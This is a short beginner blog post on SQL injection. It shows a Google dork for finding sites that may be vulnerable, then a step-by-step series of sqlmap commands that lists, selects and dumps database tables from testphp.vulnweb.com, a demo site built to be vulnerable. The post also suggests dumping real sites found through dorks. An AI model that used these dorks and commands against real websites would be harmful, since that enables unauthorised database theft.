Sql vulnerable and Google Dork

byRohit Adhikari 0

Hello friends welcome to our first blog on ethical hacking.
Remember that this Blog is only for educational purpose
So simply we all know there are many sql vulnerable sites we can dump them easily with using tools like:- sqlmap, lazysql, etc
If you're Termux user then don't worry you can also use it
Github repository link:-
The simple explanation of sqlmap or lazysql is they are automated tool with using that we can dump databases of sql vulnerable site
Now, we are moving on second topic what is google dork? Why we use it?
Introduction:- Google dork is also known as Google hacking database a hacking technique that use Google search engine where you can find vulnerable siteby searching with some special commands in google.com

Why we use it?
Now many people ask why we use it short answer is we can find vulnerable site using google dork.
Example of some commands:-
inurl:php?id= (it will find all sql vulnerable sites) if you want exact domain like com, net, tk, ml, OOO then you can search like
inurl:php?id= site:com
intitle: (which find strings in title of a page)

Now we again move to topic sqlmap
Suppose you find a sql vulnerable site then u can dump it easily now in this blog i am showing you some sql dump commands you can use it also in termux that's why i am writing python2 in commands if you're using linux and other then you can write python
Note :- i am using a website named testphp.vulnweb.com it allow us to dump/hack it
1) Python2 sqlmap.py -u http://testphp.vulnweb.com/artists.php?artist=1
2) python2 sqlmap.py -u http://testphp.vulnweb.com/artists.php?artist=1 --dbs
3) python2 sqlmap.py -u http://testphp.vulnweb.com/artists.php?artist=1
In my case testphp has 2 databases name information_schema and second one acuart
So i am going under
4)  python2 sqlmap.py -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart --tables
There have many tables i am going under carts
Now start to fetch colums
5) python2 sqlmap.py -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T carts --columns
Now i finded 3 colums i am going to dump cart_id
6) python2 sqlmap.py -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T carts -C cart_id --dump
Now dumped the database
*This blog is only for educational purpose*
I hope you enjoyed this BLOG


Tags:

Post a Comment

إرسال تعليق

أحدث أقدم

Recent in Technology News

Responsive Advertisement